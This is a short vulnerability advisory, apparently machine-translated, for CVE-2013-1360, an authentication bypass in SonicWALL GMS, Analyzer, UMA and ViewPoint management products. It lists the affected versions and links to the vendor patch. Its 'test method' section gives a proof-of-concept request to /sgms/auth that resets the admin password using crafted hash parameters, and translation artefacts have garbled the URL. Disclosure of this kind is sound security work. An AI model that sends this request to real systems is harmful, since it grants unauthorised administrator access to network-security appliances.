Release date:
Updated on: 2013-01-22
Affected Systems:
SonicWALL GMS/Analyzer/UMA 7.0.x
SonicWALL GMS/Analyzer/UMA 6.0.x
SonicWALL GMS/Analyzer/UMA 5.1.x
SonicWALL GMS/ViewPoint 5.0.x
SonicWALL GMS/ViewPoint 4.1.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57446
CVE (CAN) ID: CVE-2013-1360
SonicWALL provides Internet Security Solutions for small and medium-sized enterprises and distributed enterprises.
SonicWALL Global Management System (GMS), ViewPoint, Universal Management Appliance (UMA), Analyzer has the identity verification bypass vulnerability in implementation and sends a specially crafted request to the SGMS interface, attackers can exploit this vulnerability to access Web interfaces with administrator privileges, resulting in arbitrary code execution at the system level.
<* Source: Nikolas Sotiriu
Link: http://securitytracker.com/id/1028007
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/sgms/auth? ClientHash = 000083761376339303932346163656262 & amp; clientHash2 = 03196ba18cffc80df87a7c9092 4 acebb & amp; changePassword = 1 & amp; user = admin & amp; ctlSGMSDomainId = dmn1_000000 00000000001
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SonicWALL
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.sonicwall.com